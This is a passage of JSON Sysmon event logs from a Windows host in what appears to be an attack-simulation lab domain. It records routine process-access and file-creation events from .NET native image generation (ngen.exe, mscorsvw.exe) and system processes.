05:59:46.325","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.325\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:46.325","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D2-5F25-0000-0010F61D1100}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:46.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D2-5F25-0000-0010F61D1100}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.559\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D2-5F25-0000-0010D2221100}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:46.559","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D2-5F25-0000-0010D2221100}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.559\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D2-5F25-0000-0010D2221100}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:46.559","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D2-5F25-0000-0010D2221100}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D2-5F25-0000-0010D2221100}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:46.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D2-5F25-0000-0010D2221100}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:47.168\r\nProcessGuid: {A837DB8D-04D2-5F25-0000-0010D2221100}\r\nProcessId: 1988\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\7c4-0\\System.ServiceModel.Activation.dll\r\nCreationUtcTime: 2020-08-01 05:59:47.168","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:47.168","ProcessGuid":"{A837DB8D-04D2-5F25-0000-0010D2221100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\7c4-0\\System.ServiceModel.Activation.dll","CreationUtcTime":"2020-08-01 05:59:47.168","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001045051000}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001045051000}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001045051000}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001045051000}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001045051000}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 